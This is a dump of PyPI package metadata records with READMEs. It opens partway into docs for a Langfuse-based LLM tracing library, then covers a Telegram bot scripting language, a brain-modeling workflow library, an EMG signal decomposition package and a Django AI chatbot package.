- `timeTaken` - Execution time in seconds
- `hasReturn` - Whether function returns a value
- `hasCapturedResult` - Whether capture_result() was used
- `argumentCount` - Number of function arguments
- `isAsync` - Whether function is async
- `module` - Function's module name
- `hasError` - Whether an error occurred (error cases only)
- `errorType` - Type of error (error cases only)
#### **Case 5: Nested Functions (Parent-Child Relationships)**
```python
@general_tracing(name="Main Workflow")
async def main_workflow(task_id: str) -> dict:
"""Parent function that calls multiple child functions."""
# Step 1: Validate input
validation_result = await validate_input(task_id)
# Step 2: Process data
processing_result = await process_task_data(task_id, validation_result)
# Step 3: Generate report
await generate_task_report(task_id, processing_result)
return {
"task_id": task_id,
"status": "completed",
"validation": validation_result,
"processing": processing_result
}
@general_tracing(name="Input Validation")
async def validate_input(task_id: str) -> dict:
"""Child function - automatically nested under parent span."""
return {"task_id": task_id, "valid": True}
@general_tracing(name="Data Processing")
async def process_task_data(task_id: str, validation: dict) -> dict:
"""Child function - automatically nested under parent span."""
return {"task_id": task_id, "processed_items": 42}
@general_tracing(name="Report Generation")
async def generate_task_report(task_id: str, data: dict) -> None:
"""Child function without return value."""
report = {"task_id": task_id, "summary": data, "generated_at": datetime.now()}
capture_result(report)
```
This creates a **hierarchical trace structure** in Langfuse:
```
📊 Trace: Main Workflow
├── 🟦 Main Workflow (parent span)
│ ├── 🟦 Input Validation (child span)
│ ├── 🟦 Data Processing (child span)
│ └── 🟦 Report Generation (child span)
```
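The parent-child nesting above can be pictured as a context variable holding the current span: each traced call records its parent, then becomes the parent for anything it awaits. A toy sketch, not the library's actual implementation:

```python
import asyncio
import contextvars
import functools

_current_span = contextvars.ContextVar("current_span", default=None)
spans = []  # recorded as (span_name, parent_span_name)

def general_tracing_sketch(name):
    """Toy decorator that records parent-child span relationships."""
    def decorate(func):
        @functools.wraps(func)
        async def wrapper(*args, **kwargs):
            parent = _current_span.get()
            spans.append((name, parent))
            token = _current_span.set(name)  # become parent for nested calls
            try:
                return await func(*args, **kwargs)
            finally:
                _current_span.reset(token)
        return wrapper
    return decorate

@general_tracing_sketch("Input Validation")
async def validate(task_id):
    return {"valid": True}

@general_tracing_sketch("Main Workflow")
async def main_workflow(task_id):
    return await validate(task_id)

asyncio.run(main_workflow("t1"))
print(spans)  # [('Main Workflow', None), ('Input Validation', 'Main Workflow')]
```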
#### **Case 6: ObservabilityService Class Usage**
```python
from observe_traces import ObservabilityService
# Create service instance
observability_service = ObservabilityService()
@observability_service.general_tracing(name="Service Method")
async def service_function(data: list) -> dict:
"""Using ObservabilityService instead of direct decorator."""
processed = [item * 2 for item in data]
return {"processed": processed, "count": len(processed)}
```
#### **Case 7: Error Handling**
```python
@general_tracing(name="Error Prone Function")
async def risky_operation(data: dict) -> dict:
"""Function that might throw errors - automatically traced."""
if not data.get("valid"):
raise ValueError("Invalid data provided")
return {"status": "success", "data": data}
# Errors are automatically captured in span metadata and output
```
**Complete FastAPI Example:**
```python
from fastapi import FastAPI, Request
from observe_traces import (
LangfuseInitializer,
general_tracing,
capture_result,
unified_middleware
)
app = FastAPI()
# Initialize Langfuse
LangfuseInitializer.initialize(
langfuse_public_key="your_key",
langfuse_secret_key="your_secret",
langfuse_host="your_host"
)
# Add middleware for tracing context
@app.middleware("http")
async def tracing_middleware(request: Request, call_next):
metadata = {
"sessionId": request.headers.get("X-Session-ID", "default"),
"user": request.headers.get("X-User-Email", "anonymous"),
"environment": "production"
}
return await unified_middleware(request, call_next, metadata=metadata)
# Traced business logic functions
@general_tracing(name="Order Validation")
async def validate_order(order_data: dict) -> dict:
# Validation logic
return {"valid": True, "order_id": order_data["id"]}
@general_tracing(name="Payment Processing")
async def process_payment(order_id: str, amount: float) -> dict:
# Payment logic
return {"transaction_id": "txn_123", "status": "completed"}
@general_tracing(name="Inventory Update")
async def update_inventory(order_data: dict) -> None:
# Inventory logic (no return value)
inventory_update = {
"items_updated": len(order_data["items"]),
"timestamp": datetime.now().isoformat()
}
capture_result(inventory_update)
@general_tracing(name="Complete Order Workflow")
async def complete_order(order_data: dict) -> dict:
"""Main workflow with nested function calls."""
# Step 1: Validate order
validation = await validate_order(order_data)
# Step 2: Process payment
payment = await process_payment(order_data["id"], order_data["total"])
# Step 3: Update inventory
await update_inventory(order_data)
return {
"order_id": order_data["id"],
"status": "completed",
"validation": validation,
"payment": payment
}
# API endpoint
@app.post("/orders/complete")
async def complete_order_endpoint(order_request: OrderRequest):
result = await complete_order(order_request.dict())
return {"success": True, "result": result}
```
**Important Requirements:**
⚠️ **The general tracing decorator requires the unified middleware to work properly:**
1. **Middleware Setup**: Must use `unified_middleware` in your FastAPI application
2. **HTTP Requests**: Tracing only works via HTTP endpoints, not direct function calls
3. **Request Headers**: Include `X-Session-ID` and `X-User-Email` for better tracing context
**Benefits of General Tracing:**
- ✅ **Universal Compatibility**: Works with any Python function
- ✅ **Automatic Nesting**: Preserves parent-child relationships
- ✅ **Flexible Output Capture**: Supports both return values and captured results
- ✅ **Performance Monitoring**: Automatic timing and metadata collection
- ✅ **Error Tracking**: Comprehensive error information capture
- ✅ **Payload Optimization**: Configurable metadata filtering
- ✅ **Easy Integration**: Works alongside existing LLM, embedding, and vector DB tracers
## Custom Provider Registration
You can register custom providers using either approach:
### Using Direct Functions
```python
from observe_traces import register_provider, register_embedding_provider, register_reranking_provider
# Register custom LLM provider
register_provider(
provider_name="my_custom_llm",
token_parser=my_token_parser_function,
response_extractor=my_response_extractor_function
)
# Register custom embedding provider
register_embedding_provider(
provider_name="my_custom_embedding",
token_parser=my_token_parser_function,
price_calculator=my_price_calculator_function,
embeddings_extractor=my_embeddings_extractor_function
)
```
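As an illustration, a `token_parser`/`response_extractor` pair for a hypothetical provider whose responses look OpenAI-like might be written as follows. The response shape and the exact callback signatures expected by `register_provider()` are assumptions here; check the library's provider interface for the authoritative contract:

```python
# Hypothetical response shape for a provider called "my_custom_llm"
def my_token_parser_function(raw_response):
    """Extract token counts from the provider's raw JSON response."""
    usage = raw_response.get("usage", {})
    return {
        "prompt_tokens": usage.get("prompt_tokens", 0),
        "completion_tokens": usage.get("completion_tokens", 0),
        "total_tokens": usage.get("total_tokens", 0),
    }

def my_response_extractor_function(raw_response):
    """Pull the generated text out of the provider's raw JSON response."""
    return raw_response["choices"][0]["message"]["content"]

raw = {
    "choices": [{"message": {"content": "Hello!"}}],
    "usage": {"prompt_tokens": 12, "completion_tokens": 3, "total_tokens": 15},
}
print(my_response_extractor_function(raw))            # Hello!
print(my_token_parser_function(raw)["total_tokens"])  # 15
```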
### Using ObservabilityService
```python
from observe_traces import ObservabilityService
observability_service = ObservabilityService()
# Register custom providers
observability_service.register_llm_provider("my_custom_llm", my_custom_provider_instance)
observability_service.register_embedding_provider("my_custom_embedding", my_embedding_provider_instance)
observability_service.register_vectordb_provider("my_custom_vectordb", my_vectordb_provider_instance)
observability_service.register_reranking_provider("my_custom_reranking", my_reranking_provider_instance)
```
### Creating Custom Providers with Base Classes
For maximum customization, you can extend the base provider classes:
```python
from typing import Any, Dict, List
from observe_traces import ObservabilityService, LLMProvider, EmbeddingProvider
class MyCustomLLMProvider(LLMProvider):
"""Custom LLM provider implementation."""
def __init__(self):
super().__init__("my-custom-llm", self._extract_response)
def parse_tokens(self, response_data: Dict[str, Any]) -> Dict[str, int]:
"""Parse tokens from your API response."""
return {
"prompt_tokens": response_data.get("input_tokens", 0),
"completion_tokens": response_data.get("output_tokens", 0),
"total_tokens": response_data.get("total_tokens", 0)
}
def calculate_cost(self, tokens_data: Dict[str, int], model_name: str) -> Dict[str, float]:
"""Calculate cost based on your pricing model."""
input_cost = tokens_data.get("prompt_tokens", 0) * 0.00001 # Your pricing
output_cost = tokens_data.get("completion_tokens", 0) * 0.00002
return {
"input": input_cost,
"output": output_cost,
"total": input_cost + output_cost
}
    def _extract_response(self, d
```
2.4 | wetg | 7.0.1 | WETG v7 Super Weox — One-File Telegram Bot Engine. Write Telegram bots in a simple scripting language. | # 🔥 WETG v7 — Super Weox
> **One-File Telegram Bot Engine** — Write Telegram bots in a simple scripting language. No boilerplate. No classes. Just write.
```bash
pip install wetg
```
---
## ⚡ Quick Start
```bash
# Create a bot from template
wetg new mybot.wetg
# Edit it, add your token from @BotFather
nano mybot.wetg
# Run it
wetg run mybot.wetg
```
That's it.
---
## 📝 Language
### Hello World bot
```
bot "YOUR_TOKEN_HERE"
on /start
send "Hello, {user.name}! 👋"
on /ping
send "🏓 Pong!"
```
### Full feature example
```
bot "YOUR_TOKEN_HERE"
set welcome=Hello!
# ── Commands ──────────────────────────────
on /start
send "👋 Hi {user.name}! {welcome}"
on /help
send "/start\n/ping\n/echo\n/about"
on /ping
send "🏓 Pong!"
on /about
button = ["Our Website", "https://example.com"]
send "Powered by WETG v7 Super Weox." with button
on /echo
ask "What should I echo?"
# ── User messages ─────────────────────────
on usermsg
if {usermsg} == "hi"
send "Hey! 👋"
elif {usermsg} == "bye"
send "See ya! 👋"
else
send "You said: {usermsg}"
# ── Functions ─────────────────────────────
function welcome_user
send "Welcome, {user.name}!"
send "Your ID: {user.id}"
```
---
## 📖 Language Reference
### Token
```
bot "YOUR_TOKEN"
```
Or use `config.txt` (recommended — don't commit tokens to git):
```
TOKEN=YOUR_TOKEN
```
### Sending messages
| Syntax | Description |
|--------|-------------|
| `send "text"` | Plain message |
| `send "{user.name}"` | With variable interpolation |
| `send "**bold**" with markdown` | Markdown formatting |
| `send "<b>bold</b>" with html` | HTML formatting |
| `send "photo.jpg" with image` | Local image file |
| `send "https://..." with image` | Image from URL |
| `button = ["Label", "url"]` then `send "text" with button` | Inline button |
### Variables
| Variable | Value |
|----------|-------|
| `{user.name}` | User's first name |
| `{user.id}` | User's Telegram ID |
| `{user.username}` | User's @username |
| `{bot.name}` | Bot display name |
| `{bot.username}` | Bot @username |
| `{usermsg}` | Last message text from user |
### Control flow
```
if {usermsg} == "yes"
send "You said yes!"
elif {usermsg} == "no"
send "You said no."
else
send "You said something else."
```
### Loops
```
loop 5 times
send "Looping!"
stop
```
### Ask / input
```
on /form
ask "What's your name?"
on usermsg
send "Nice to meet you, {usermsg}!"
```
### Functions
```
function greet
send "Hi {user.name}!"
on /start
call greet
```
### Variables (set)
```
set counter=0
on /start
set counter=1
send "Counter is {counter}"
```
### Imports
```
import random
on /roll
send "🎲 {random.randint(1, 6)}"
```
---
## 🐍 Python API
```python
from wetg_superweox import Wetg
import asyncio
code = """
bot "YOUR_TOKEN"
on /start
send "Hello from Python API!"
"""
bot = Wetg(code)
bot.parse()
asyncio.run(bot.run())
```
Or use the helper:
```python
from wetg_superweox import run_file
run_file("mybot.wetg")
```
---
## 🛠 CLI
```
wetg run <file.wetg> Run a bot
wetg new <file.wetg> Create bot from template
wetg check <file.wetg> Validate .wetg file
wetg version Show version
wetg help Show help
```
Shortcuts:
```bash
wetg mybot.wetg # same as: wetg run mybot.wetg
python -m wetg_superweox run mybot.wetg
```
---
## 🔒 Tips
- Store tokens in `config.txt`, not in `.wetg` files
- Add to `.gitignore`:
```
config.txt
.env
```
---
## 📜 License
MIT
| text/markdown | null | null | null | null | MIT | telegram, bot, wetg, scripting, dsl | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Communications :: Chat",
"Topic :: Software Development :: Interpreters"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"python-telegram-bot>=20.0"
] | [] | [] | [] | [
"Homepage, https://github.com/weoxfx/wetg",
"Issues, https://github.com/weoxfx/wetg/issues"
] | twine/6.2.0 CPython/3.12.12 | 2026-02-20T09:24:10.260542 | wetg-7.0.1.tar.gz | 10,062 | bb/ca/affdcc0af1ba759f134f2194960e784fa75c37a43cd9f7e813b43b02d79f/wetg-7.0.1.tar.gz | source | sdist | null | false | 4a79587ec233fa4c03b223679aa0d97c | 293c6b0532abaa6d1af8a4b8f9c69fff8ced5951658e901d3ff7d032a00f0479 | bbcaaffdcc0af1ba759f134f2194960e784fa75c37a43cd9f7e813b43b02d79f | null | [
"LICENSE"
] | 249 |
2.4 | obi-one | 2026.2.3 | Standardized library of functions and workflows for biophysically-detailed brain modeling | # OBI-ONE
OBI-ONE is a standardized library of workflows for biophysically-detailed brain modeling, with the following features:
- Integration with a standardized cloud database for neuroscience and computational neuroscience through [**entitysdk**](https://github.com/openbraininstitute/entitysdk).
- Standardized provenance of workflows.
- Standardized parameter scans across different modeling workflows.
- Corresponding OpenAPI schema and service generated from Pydantic.
<br>
# Installation
Pre-installation
```
brew install uv open-mpi boost cmake
```
Virtual environment (registered as a Jupyter kernel)
```
make install
```
<br>
# Examples
Notebooks are available in [**examples/**](examples/)
<br>
# Technical Overview / Glossary
The package is split into [**core/**](core/) and [**scientific/**](scientific/) code.
[**core/**](core/) defines the following key classes:
- [**ScanConfig**](obi_one/core/scan_config.py): defines the configuration for a specific modeling use case, such as [CircuitSimulationScanConfig](obi_one/scientific/simulation/simulations.py). A ScanConfig is composed of one or more Blocks (see next), which define the parameterization of the use case, and can currently contain both single Blocks and dictionaries of Blocks. Each ScanConfig, for example, has its own Initialize Block for specifying the base parameters of the use case. Dictionaries of Blocks of a particular type are used where the ScanConfig accepts an unspecified number of that Block type, such as Stimulus Blocks.
- [**Block**](obi_one/core/block.py): defines a component of a ScanConfig. Blocks support the specification of parameters to be scanned over in a multi-dimensional parameter scan: when using a ScanConfig (in a Jupyter Notebook, for example), any parameter specified as a list becomes a dimension of the multi-dimensional parameter scan when passed to a Scan object (see below).
- [**SingleConfig**](obi_one/core/single.py):
- [**Task**](obi_one/core/task.py):
- [**ScanGenerationTask**](obi_one/core/scan_generation_task.py): an example Task which takes as input a single ScanConfig, an output path, and a string specifying how output files should be stored. The scan.execute() function can then be called to generate the multi-dimensional scan.
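The expansion of list-valued parameters into scan dimensions can be sketched generically with a Cartesian product (an illustration with hypothetical parameter names, not obi-one's actual API):

```python
from itertools import product

# Hypothetical Block parameterization: list-valued entries become scan
# dimensions, scalar entries stay fixed across all generated configurations.
params = {"amplitude": [0.1, 0.2, 0.3], "frequency": [10, 20], "duration": 5.0}

fixed = {k: v for k, v in params.items() if not isinstance(v, list)}
dims = {k: v for k, v in params.items() if isinstance(v, list)}

single_configs = [
    {**fixed, **dict(zip(dims, combo))} for combo in product(*dims.values())
]
# 3 amplitudes x 2 frequencies -> 6 single configurations, each with duration=5.0
```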
<br>
# FastAPI Service
Launch the FastAPI service, with docs viewable at http://127.0.0.1:8100/docs:
```
make run-local
```
<br>
# Documentation
OBI-ONE uses [MkDocs](https://www.mkdocs.org/) with the [Material theme](https://squidfunk.github.io/mkdocs-material/) for documentation.
## Installing Documentation Dependencies
To install the documentation dependencies (MkDocs and MkDocs Material) without affecting your existing dependencies:
```bash
make install-docs
```
This command uses `uv sync --group docs` to add only the documentation dependencies to your environment, ensuring that other installed packages remain unchanged.
## Serving Documentation Locally
To build and serve the documentation locally for preview:
```bash
make serve-docs
```
This will start a local development server (typically at `http://127.0.0.1:8000`) where you can preview the documentation. The server will automatically reload when you make changes to the documentation files.
## Tags
Tags are metadata used to link documentation `.md` files to products. Each documentation file should include appropriate tags in its frontmatter to categorize and organize content.
## Continuous Integration
The documentation is automatically checked in CI on pull requests. The `.github/workflows/check-docs.yml` workflow:
1. Checks if any files in the `docs/` directory have been modified in the pull request
2. If no documentation changes are detected, the check fails with an error message
3. You can skip this check by adding the `skip docs` label to your pull request
This ensures that documentation is updated alongside code changes. The check only runs on pull requests targeting `main` and can be bypassed with the `skip docs` label when documentation updates are not needed.
<br>
# Contributions
Please see [**CONTRIBUTIONS.md**](CONTRIBUTIONS.md) for guidelines on how to contribute.
# Acknowledgements
Copyright © 2025 Open Brain Institute
| text/markdown | null | James Isbister <james.isbister@openbraininstitute.org>, Christoph Pokorny <christoph.pokorny@openbraininstitute.org>, Daniela Egas Santander <daniela.egassantander@openbraininstitute.org>, Gianluca Ficarelli <gianluca.ficarelli@openbraininstitute.org>, Michael Reimann <michael.reimann@openbraininstitute.org>, Darshan Mandge <darshan.mandge@openbraininstitute.org>, Ilkan Kilic <ilkan.kilic@openbraininstitute.org>, Aurélien Jaquier <aurelien.jaquier@openbraininstitute.org>, Dries Verachtert <dries.verachtert@openbraininstitute.org>, Jean-Denis Courcol <jean-denis.courcol@openbraininstitute.org>, Armando Romani <armando.romani@openbraininstitute.org>, Mike Geveart <michael.gevaert@openbraininstitute.org>, Nicolas Frank <nicolas.frank@openbraininstitute.org> | null | null | null | null | [
"Programming Language :: Python :: 3",
"Operating System :: OS Independent"
] | [] | null | null | <3.13,>=3.12.2 | [] | [] | [] | [
"pydantic>=2.10.6",
"pydantic-settings>=2.8.1",
"pydantic-core",
"brainbuilder>=0.20.2",
"bluepysnap>=3.0.2",
"fastapi",
"uvicorn",
"starlette",
"python-multipart",
"jupyter",
"notebook",
"jupyterlab>=4.4.8",
"ipykernel",
"sqlalchemy",
"blueetl",
"aiofiles",
"neurom",
"morph-tool",
"pyvista",
"entitysdk",
"obi-auth>=1.0.0",
"networkx>=3.4.2",
"pyjwt>=2.10.1",
"cachetools>=5.5.2",
"httpx>=0.28.1",
"bluepyefe>=2.3.51",
"connectome-utilities>=0.4.11",
"connectome-manipulator>=1.0.4",
"bluecellulab>=2.6.71",
"obi_notebook",
"morph_spines",
"caveclient>=7.11.0",
"obp-accounting-sdk>=0.5.0",
"connectome-analysis>=1.0.1; extra == \"connectivity\""
] | [] | [] | [] | [
"Homepage, https://github.com/openbraininstitute/obi-one",
"Issues, https://github.com/openbraininstitute/obi-one/issues"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:23:58.055420 | obi_one-2026.2.3.tar.gz | 16,193,300 | 57/3a/563bc5c74c072fae9ca45ba58122ee4b0bd6095ed44b1afc9c5cf25af46b/obi_one-2026.2.3.tar.gz | source | sdist | null | false | ecf67172515cc8e618357f14d461b989 | 1a349db72eb8883f034c0dbe04b56de53b64a12aaec68768566f6305cd4bb5c2 | 573a563bc5c74c072fae9ca45ba58122ee4b0bd6095ed44b1afc9c5cf25af46b | Apache-2.0 | [
"LICENSE"
] | 175 |
2.4 | swarm-contrastive-decomposition | 0.1.3 | Decomposition of Neurophysiological Time Series Signals with a Particle Swarm Optimised Independence Estimator | # Swarm-Contrastive Decomposition 🧠
[](https://pypi.org/project/swarm-contrastive-decomposition/)
[](https://www.python.org/downloads/)
[](https://creativecommons.org/licenses/by-nc/4.0/)
A Python package for decomposition of neurophysiological time series signals using a Particle Swarm Optimised Independence Estimator for Blind Source Separation.
<div align="center">
<img src="images/pipeline.png" alt="Pipeline" width="500"/>
</div>
## Table of Contents 📚
- [Installation](#installation)
- [Quick Start](#quick-start)
- [Usage](#usage)
- [Configuration](#configuration)
- [Test Data](#test-data)
- [Contributing](#contributing)
- [License](#license)
- [Citation](#citation)
- [Contact](#contact)
## Installation 🛠️
### From PyPI (Recommended)
```bash
pip install swarm-contrastive-decomposition
```
### From GitHub (Latest Development Version)
```bash
pip install git+https://github.com/AgneGris/swarm-contrastive-decomposition.git
```
### From Source
```bash
git clone https://github.com/AgneGris/swarm-contrastive-decomposition
cd swarm-contrastive-decomposition
pip install -e .
```
### Verify Installation
```bash
python -c "import scd; print(f'SCD version: {scd.__version__}')"
```
## Quick Start 🚀
```python
import scd
# Train with default configuration
dictionary, timestamps = scd.train("data/input/emg.npy")
# Save results
scd.save_results("data/output/emg.pkl", dictionary)
```
## Usage
### Basic Usage
```python
import scd
# Use a predefined configuration
dictionary, timestamps = scd.train(
"path/to/your/data.mat",
config_name="surface" # or "default", "intramuscular"
)
scd.save_results("output.pkl", dictionary)
```
### With Configuration Overrides
```python
import scd
# Override specific parameters
dictionary, timestamps = scd.train(
"data/input/emg.npy",
config_name="surface",
max_iterations=100, # override for quick testing
output_final_source_plot=True
)
```
### Step-by-Step Control
```python
import scd
# Load configuration
config = scd.load_config("surface")
# Load data
neural_data = scd.load_data("data/input/emg.npy", device=config.device)
# Preprocess
neural_data = scd.preprocess_data(neural_data, config)
# Train model
dictionary, timestamps = scd.train_model(neural_data, config)
# Save results
scd.save_results("output.pkl", dictionary)
```
### Supported Data Formats
- `.mat` — MATLAB files (specify the variable name with `key` parameter)
- `.npy` — NumPy arrays
```python
# For .mat files with custom variable name
dictionary, timestamps = scd.train("data.mat", key="emg_data")
# For .npy files
dictionary, timestamps = scd.train("data.npy")
```
Data should have shape `(time, channels)` or `(channels, time)` — the loader will automatically transpose if needed.
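For instance, a `.npy` file in the expected layout can be produced with NumPy (synthetic stand-in data for illustration, not real EMG):

```python
import numpy as np

# Synthetic stand-in recording: 10 s at 10240 Hz across 8 channels,
# stored in the (time, channels) layout described above.
rng = np.random.default_rng(seed=0)
emg = rng.standard_normal((10240 * 10, 8)).astype(np.float32)
np.save("emg.npy", emg)  # then: dictionary, timestamps = scd.train("emg.npy")
```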
## Configuration ⚙️
Configurations are defined in `scd/configs.json`. Available presets:
| Config Name | Use Case | Sampling Rate | Description |
|-------------|----------|---------------|-------------|
| `default` | General purpose | 10240 Hz | Balanced settings for most EMG data |
| `surface` | Surface EMG | 10240 Hz | Optimized for surface recordings |
| `intramuscular` | Intramuscular EMG | 10240 Hz | Higher iterations for fine-wire recordings |
### Configuration Parameters
| Parameter | Description | Default |
|-----------|-------------|---------|
| `device` | `"cuda"` for GPU or `"cpu"` | `"cuda"` |
| `acceptance_silhouette` | Quality threshold for source acceptance | `0.85` |
| `extension_factor` | Typically `1000 / num_channels`. Higher values may improve results | `25` |
| `low_pass_cutoff` | Low-pass filter cutoff frequency (Hz) | `4400` |
| `high_pass_cutoff` | High-pass filter cutoff frequency (Hz) | `10` |
| `sampling_frequency` | Sampling frequency of your signal (Hz) | `10240` |
| `start_time` | Start time for signal trimming (s). Use `0` for beginning | `0` |
| `end_time` | End time for signal trimming (s). Use `-1` for entire signal | `-1` |
| `max_iterations` | Maximum decomposition iterations | `200` |
| `peel_off_window_size_ms` | Window size for spike-triggered average (ms) | `20` |
| `output_final_source_plot` | Generate plot of final sources | `false` |
| `use_coeff_var_fitness` | Use coefficient of variation fitness. `true` for EMG, `false` for intracortical | `true` |
| `remove_bad_fr` | Filter sources with firing rates < 2 Hz or > 100 Hz | `true` |
| `clamp_percentile` | Percentile for amplitude clamping | `0.999` |
### Custom Configuration
Add your own configuration to `scd/configs.json`:
```json
{
  "my_experiment": {
    "device": "cuda",
    "acceptance_silhouette": 0.80,
    "extension_factor": 30,
    "sampling_frequency": 2048,
    ...
  }
}
Then use it:
```python
dictionary, timestamps = scd.train("data.mat", config_name="my_experiment")
```
## Test Data 🧪
The repository includes test data to verify your installation:
- **File:** `data/input/emg.npy`
- **Type:** Surface EMG
- **Sampling rate:** 10240 Hz
- **Configuration:** Use `"surface"` config
```python
import scd
# Run with test data
dictionary, timestamps = scd.train(
"data/input/emg.npy",
config_name="surface"
)
print(f"Found {len(dictionary)} motor units")
```
## Contributing 🤝
We welcome contributions! Here's how you can contribute:
1. Fork the repository
2. Create a feature branch (`git checkout -b feature/newfeature`)
3. Commit your changes (`git commit -m 'Add some newfeature'`)
4. Push to the branch (`git push origin feature/newfeature`)
5. Open a pull request
## License 📜
This project is licensed under the CC BY-NC 4.0 License.
## Citation
If you use this code in your research, please cite our paper:
```bibtex
@article{grison2024particle,
author={Grison, Agnese and Clarke, Alexander Kenneth and Muceli, Silvia and Ibáñez, Jaime and Kundu, Aritra and Farina, Dario},
journal={IEEE Transactions on Biomedical Engineering},
title={A Particle Swarm Optimised Independence Estimator for Blind Source Separation of Neurophysiological Time Series},
year={2024},
volume={},
number={},
pages={1-11},
doi={10.1109/TBME.2024.3446806},
keywords={Recording; Time series analysis; Sorting; Vectors; Measurement; Electrodes; Probes; Independent component analysis; particle swarm optimisation; blind source separation; intramuscular electromyography; intracortical recording}
}
```
## Contact
For questions or inquiries:
**Agnese Grison**
📧 agnese.grison16@imperial.ac.uk
| text/markdown | null | Agnese Grison <agnese.grison16@imperial.ac.uk> | null | null | CC-BY-NC-4.0 | EMG, neural signals, decomposition, particle swarm, ICA, blind source separation | [
"Development Status :: 4 - Beta",
"Intended Audience :: Science/Research",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Topic :: Scientific/Engineering :: Bio-Informatics"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"numpy>=1.20.0",
"torch>=1.9.0",
"scipy>=1.7.0",
"h5py>=3.0.0",
"mat73>=0.59",
"matplotlib>=3.5.0",
"pytest>=7.0; extra == \"dev\"",
"black>=23.0; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/AgneGris/swarm-contrastive-decomposition",
"Repository, https://github.com/AgneGris/swarm-contrastive-decomposition",
"Issues, https://github.com/AgneGris/swarm-contrastive-decomposition/issues"
] | twine/6.2.0 CPython/3.10.13 | 2026-02-20T09:23:36.881937 | swarm_contrastive_decomposition-0.1.3.tar.gz | 22,369 | 16/62/074eb3da693db0fbd76351a1f51d4e597145e14cf804ce9525b05b5abbbc/swarm_contrastive_decomposition-0.1.3.tar.gz | source | sdist | null | false | 54b111dd5bcc419bd6da9ed3b8eb023f | dac66aef4d0978c0fabcc30c67e6a17af75009cea0d004345c2287770973352c | 1662074eb3da693db0fbd76351a1f51d4e597145e14cf804ce9525b05b5abbbc | null | [
"LICENSE"
] | 218 |
2.4 | django-ai-chatbot | 0.1.0 | AI chatbot assistant for Django/DRF that analyzes your project models and responds to queries | # Django AI Chatbot Assistant
An intelligent AI chatbot package for Django/DRF that analyzes your project's models and data to provide context-aware responses. Integrates with HuggingFace LLMs and optional Tavily web search.
## Features
- 🤖 **HuggingFace Integration**: Use any HuggingFace model for responses
- 📊 **Auto Model Discovery**: Automatically introspects Django models and fields
- 🌐 **Web Search**: Optional Tavily API integration for current web data
- ⚙️ **Easy Configuration**: Simple Django settings integration
- 🔒 **Model Filtering**: Control which models the chatbot can access
## Installation
```bash
pip install django-ai-chatbot
```
## Quick Start
### 1. Add to Django Settings
```python
# settings.py
INSTALLED_APPS = [
# ... other apps
'ai_chatbot',
]
# Required: HuggingFace Configuration
AI_CHATBOT_HF_API_KEY = 'your-huggingface-api-key'
AI_CHATBOT_HF_MODEL = 'mistralai/Mistral-7B-Instruct-v0.2' # Optional, this is default
# Optional: Tavily Web Search
AI_CHATBOT_TAVILY_API_KEY = 'your-tavily-api-key' # Optional
# Optional: Restrict which models the chatbot can access
AI_CHATBOT_ALLOWED_MODELS = [
'myapp.User',
'myapp.Product',
'blog.Post',
] # If empty or not set, all models are accessible
```
### 2. Use in Your Code
```python
from ai_chatbot import AIChatbot
# Initialize chatbot
chatbot = AIChatbot()
# Ask a question about your models
response = chatbot.ask("What fields does the User model have?")
print(response)
# Use web search for current information
response = chatbot.ask(
"What are the latest trends in Django development?",
use_web_search=True
)
print(response)
# Customize generation parameters
response = chatbot.ask(
"Explain the Product model structure",
max_tokens=1000,
temperature=0.5
)
```
### 3. Example in Django View
```python
from django.http import JsonResponse
from ai_chatbot import AIChatbot
def chatbot_view(request):
    query = request.GET.get('query', '')
    use_web = request.GET.get('web_search', 'false').lower() == 'true'
    chatbot = AIChatbot()
    response = chatbot.ask(query, use_web_search=use_web)
    return JsonResponse({'response': response})
```
### 4. Example in DRF ViewSet
```python
from rest_framework.decorators import action
from rest_framework.response import Response
from rest_framework import viewsets
from ai_chatbot import AIChatbot
class ChatbotViewSet(viewsets.ViewSet):
    @action(detail=False, methods=['post'])
    def ask(self, request):
        query = request.data.get('query')
        use_web = request.data.get('use_web_search', False)
        chatbot = AIChatbot()
        response = chatbot.ask(query, use_web_search=use_web)
        return Response({'response': response})
```
## Configuration Options
| Setting | Required | Default | Description |
|---------|----------|---------|-------------|
| `AI_CHATBOT_HF_API_KEY` | Yes | None | Your HuggingFace API key |
| `AI_CHATBOT_HF_MODEL` | No | `mistralai/Mistral-7B-Instruct-v0.2` | HuggingFace model to use |
| `AI_CHATBOT_TAVILY_API_KEY` | No | None | Tavily API key for web search |
| `AI_CHATBOT_ALLOWED_MODELS` | No | `[]` (all models) | List of models to expose (format: `app.Model`) |
## API Reference
### AIChatbot.ask()
```python
chatbot.ask(
query: str,
use_web_search: bool = False,
max_tokens: int = 500,
temperature: float = 0.7
) -> str
```
**Parameters:**
- `query`: The user's question
- `use_web_search`: Enable Tavily web search
- `max_tokens`: Maximum tokens in response
- `temperature`: LLM temperature (0.0-1.0)
**Returns:** Generated response string
## How It Works
1. **Model Introspection**: Automatically discovers all Django models and their fields
2. **Context Building**: Creates a schema context from your models
3. **Web Search** (optional): Fetches current web data via Tavily
4. **LLM Generation**: Sends context + query to HuggingFace model
5. **Response**: Returns AI-generated answer based on your project data
## Requirements
- Python >= 3.8
- Django >= 3.2
- huggingface-hub >= 0.19.0
- requests >= 2.31.0
## License
MIT License - see LICENSE file for details
## Contributing
Contributions welcome! Please open an issue or submit a PR.
## Support
For issues and questions: https://github.com/hitenjoshi/django-ai-chatbot/issues
| text/markdown | null | Hiten Joshi <hiten.mmt@gmail.com> | null | null | MIT | ai, chatbot, django, drf, artificial-intelligence, huggingface, tavily | [
"Framework :: Django",
"Framework :: Django :: 3.2",
"Framework :: Django :: 4.0",
"Framework :: Django :: 5.0",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Intended Audience :: Developers",
"Topic :: Software Development :: Libraries :: Python Modules"
] | [] | null | null | >=3.8 | [] | [] | [] | [
"django>=3.2",
